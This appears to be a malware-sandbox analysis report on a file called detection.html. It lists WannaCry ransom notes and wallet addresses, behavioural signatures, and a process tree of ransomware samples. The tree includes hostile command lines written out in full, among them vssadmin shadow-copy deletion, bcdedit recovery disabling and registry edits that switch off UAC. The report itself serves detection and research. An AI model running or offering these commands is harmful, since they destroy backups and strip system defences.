Overview

overview

10

Static

static

1

detection.html

windows11-21h2-x64

10

Analysis

  • max time kernel
    512s
  • max time network
    485s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    01-02-2025 14:51

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    detection.html

  • Size

    7KB

  • MD5

    60e328924b7b87dc5548518c888aaf62

  • SHA1

    66470e60ce1ff42244252240aa14f5eed1a826c5

  • SHA256

    5336e0393e352afe50f4740069dd7a071d74811b13dc47e8e79e6344ef27356f

  • SHA512

    71094efcef7f79aa47403c0a177b9e1b6ea5c1002bf8f751841d9025c3c9c97b20f0552dd412796d0fd4ca86492a1e5af95353ca22e6813e056ce0f1ce25bfb7

  • SSDEEP

    192:Ftsm1pT1cxgyv5AvnHeuAprvC7wtVAanvnvdUhW5QUPKyun7ne9GQ7pTT+T1Uu2:FPpOgyv50nHeuApLC7wtVAavvdKAZSbo

Score
10/10
wannacrydefense_evasiondiscoveryevasionexecutionimpactpersistenceransomwarespywarestealertrojanupxworm

Malware Config

Extracted

Path

C:\Users\Admin\Documents\!Please Read Me!.txt

Family

wannacry

Ransom Note
Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 15zGqZCTcys6eCjDkE3DypCjXi6QWRV6V1 Next, please find the decrypt software on your desktop, an executable file named "!WannaDecryptor!.exe". If it does not exsit, download the software from the address below. (You may need to disable your antivirus for a while.) rar password: wcry123 Run and follow the instructions! �
Wallets

15zGqZCTcys6eCjDkE3DypCjXi6QWRV6V1

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\@[email protected]

Family

wannacry

Ransom Note
Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw Next, please find an application file named "@[email protected]". It is the decrypt software. Run and follow the instructions! (You may need to disable your antivirus for a while.) Q: How can I trust? A: Don't worry about decryption. We will decrypt your files surely because nobody will trust us if we cheat users. * If you need our assistance, send a message by clicking <Contact Us> on the decryptor window. �
Wallets

12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw

Signatures

  • Modifies WinLogon for persistence 2 TTPs 2 IoCs
    persistence
  • Modifies visibility of file extensions in Explorer 2 TTPs 9 IoCs
    defense_evasion
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • UAC bypass 3 TTPs 9 IoCs
    defense_evasiontrojan
  • Wannacry

    WannaCry is a ransomware cryptoworm.

    ransomwarewormwannacry
  • Wannacry family
    wannacry
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomwaredefense_evasionimpactexecution
  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
    ransomwareevasion
  • Disables Task Manager via registry modification
    defense_evasion
  • Drops startup file 5 IoCs
  • Executes dropped EXE 44 IoCs
  • Loads dropped DLL 23 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
    discovery
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Adds Run key to start application 2 TTPs 6 IoCs
    persistence
  • Blocklisted process makes network request 1 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
    defense_evasion
  • Drops file in System32 directory 64 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 4 IoCs
    ransomware
  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Drops file in Program Files directory 2 IoCs
  • Drops file in Windows directory 25 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Interacts with shadow copies 3 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Kills process with taskkill 4 IoCs
    defense_evasion
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
    adwarespyware
  • Modifies data under HKEY_USERS 3 IoCs
  • Modifies registry class 2 IoCs
  • Modifies registry key 1 TTPs 28 IoCs
  • NTFS ADS 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 58 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 13 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 14 IoCs
  • Suspicious use of SetWindowsHookEx 26 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware
  • Views/modifies file attributes 1 TTPs 2 IoCs
    defense_evasion

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument C:\Users\Admin\AppData\Local\Temp\detection.html
    1⤵
    • Enumerates system info in registry
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2848
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x104,0x108,0x10c,0x100,0x110,0x7ffb6ec53cb8,0x7ffb6ec53cc8,0x7ffb6ec53cd8
      2⤵
        PID:4664
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1852,7486532205689848110,7987959379990115064,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1920 /prefetch:2
        2⤵
          PID:764
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1852,7486532205689848110,7987959379990115064,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2384 /prefetch:3
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:3712
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1852,7486532205689848110,7987959379990115064,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2688 /prefetch:8
          2⤵
            PID:956
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,7486532205689848110,7987959379990115064,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3192 /prefetch:1
            2⤵
              PID:2632
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,7486532205689848110,7987959379990115064,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1
              2⤵
                PID:2952
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,7486532205689848110,7987959379990115064,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4032 /prefetch:1
                2⤵
                  PID:1476
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,7486532205689848110,7987959379990115064,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4668 /prefetch:1
                  2⤵
                    PID:3372
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,7486532205689848110,7987959379990115064,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5108 /prefetch:1
                    2⤵
                      PID:2864
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,7486532205689848110,7987959379990115064,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5188 /prefetch:1
                      2⤵
                        PID:2580
                      • C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1852,7486532205689848110,7987959379990115064,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5828 /prefetch:8
                        2⤵
                        • Suspicious behavior: EnumeratesProcesses
                        PID:1760
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1852,7486532205689848110,7987959379990115064,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3300 /prefetch:8
                        2⤵
                        • Suspicious behavior: EnumeratesProcesses
                        PID:3324
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,7486532205689848110,7987959379990115064,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4060 /prefetch:1
                        2⤵
                          PID:4848
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,7486532205689848110,7987959379990115064,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5864 /prefetch:1
                          2⤵
                            PID:1744
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,7486532205689848110,7987959379990115064,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5936 /prefetch:1
                            2⤵
                              PID:1216
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,7486532205689848110,7987959379990115064,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6076 /prefetch:1
                              2⤵
                                PID:1472
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,7486532205689848110,7987959379990115064,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3872 /prefetch:1
                                2⤵
                                  PID:856
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,7486532205689848110,7987959379990115064,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6516 /prefetch:1
                                  2⤵
                                    PID:4920
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1852,7486532205689848110,7987959379990115064,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=6924 /prefetch:2
                                    2⤵
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:4284
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1852,7486532205689848110,7987959379990115064,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6208 /prefetch:8
                                    2⤵
                                    • NTFS ADS
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:3976
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,7486532205689848110,7987959379990115064,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3132 /prefetch:1
                                    2⤵
                                      PID:7160
                                  • C:\Windows\System32\CompPkgSrv.exe
                                    C:\Windows\System32\CompPkgSrv.exe -Embedding
                                    1⤵
                                      PID:2964
                                    • C:\Windows\System32\CompPkgSrv.exe
                                      C:\Windows\System32\CompPkgSrv.exe -Embedding
                                      1⤵
                                        PID:2252
                                      • C:\Windows\System32\rundll32.exe
                                        C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                        1⤵
                                          PID:2464
                                        • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\SporaRansomware.exe
                                          "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\SporaRansomware.exe"
                                          1⤵
                                          • Drops startup file
                                          • System Location Discovery: System Language Discovery
                                          PID:3052
                                          • C:\Windows\SysWOW64\wbem\WMIC.exe
                                            "C:\Windows\System32\wbem\WMIC.exe" process call create "cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures"
                                            2⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:1680
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Desktop\USC21-C9XAT-OTRTX-HTKTO.HTML
                                            2⤵
                                              PID:3440
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffb6ec53cb8,0x7ffb6ec53cc8,0x7ffb6ec53cd8
                                                3⤵
                                                  PID:1620
                                            • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\ViraLock.exe
                                              "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\ViraLock.exe"
                                              1⤵
                                              • Adds Run key to start application
                                              • Suspicious behavior: EnumeratesProcesses
                                              PID:4536
                                              • C:\Users\Admin\TgkUYYAk\xgkkoAQU.exe
                                                "C:\Users\Admin\TgkUYYAk\xgkkoAQU.exe"
                                                2⤵
                                                • Executes dropped EXE
                                                • Adds Run key to start application
                                                • Drops file in System32 directory
                                                • System Location Discovery: System Language Discovery
                                                • Suspicious behavior: GetForegroundWindowSpam
                                                PID:4124
                                              • C:\ProgramData\KOcUocAg\fgMkMoUs.exe
                                                "C:\ProgramData\KOcUocAg\fgMkMoUs.exe"
                                                2⤵
                                                • Executes dropped EXE
                                                • Adds Run key to start application
                                                PID:3424
                                              • C:\Windows\SysWOW64\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\ViraLock"
                                                2⤵
                                                  PID:3912
                                                  • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\ViraLock.exe
                                                    C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\ViraLock
                                                    3⤵
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:4504
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\ViraLock"
                                                      4⤵
                                                        PID:2812
                                                        • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\ViraLock.exe
                                                          C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\ViraLock
                                                          5⤵
                                                          • System Location Discovery: System Language Discovery
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          PID:2024
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\ViraLock"
                                                            6⤵
                                                              PID:1068
                                                              • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\ViraLock.exe
                                                                C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\ViraLock
                                                                7⤵
                                                                • Executes dropped EXE
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                PID:2072
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\ViraLock"
                                                                  8⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:3200
                                                                  • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\ViraLock.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\ViraLock
                                                                    9⤵
                                                                    • Executes dropped EXE
                                                                    • System Location Discovery: System Language Discovery
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    PID:4768
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\ViraLock"
                                                                      10⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:2496
                                                                      • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\ViraLock.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\ViraLock
                                                                        11⤵
                                                                        • Executes dropped EXE
                                                                        • System Location Discovery: System Language Discovery
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        PID:8
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\ViraLock"
                                                                          12⤵
                                                                          • System Location Discovery: System Language Discovery
                                                                          PID:3352
                                                                          • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\ViraLock.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\ViraLock
                                                                            13⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                            PID:2356
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\ViraLock"
                                                                              14⤵
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:4512
                                                                              • C:\Windows\System32\Conhost.exe
                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                15⤵
                                                                                  PID:3652
                                                                                • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\ViraLock.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\ViraLock
                                                                                  15⤵
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                  PID:2124
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\ViraLock"
                                                                                    16⤵
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    PID:1588
                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\ViraLock.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\ViraLock
                                                                                      17⤵
                                                                                      • Executes dropped EXE
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      PID:4340
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\ViraLock"
                                                                                        18⤵
                                                                                          PID:640
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
                                                                                          18⤵
                                                                                          • Modifies visibility of file extensions in Explorer
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          • Modifies registry key
                                                                                          PID:1000
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
                                                                                          18⤵
                                                                                          • Modifies registry key
                                                                                          PID:1096
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
                                                                                          18⤵
                                                                                          • UAC bypass
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          • Modifies registry key
                                                                                          PID:2348
                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            19⤵
                                                                                              PID:2112
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mSksUkIw.bat" "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\ViraLock.exe""
                                                                                            18⤵
                                                                                              PID:1680
                                                                                              • C:\Windows\SysWOW64\cscript.exe
                                                                                                cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
                                                                                                19⤵
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:4776
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
                                                                                          16⤵
                                                                                          • Modifies visibility of file extensions in Explorer
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          • Modifies registry key
                                                                                          PID:2148
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
                                                                                          16⤵
                                                                                          • Modifies registry key
                                                                                          PID:1448
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
                                                                                          16⤵
                                                                                          • UAC bypass
                                                                                          • Modifies registry key
                                                                                          PID:3552
                                                                                        • C:\Windows\SysWOW64\cmd.exe
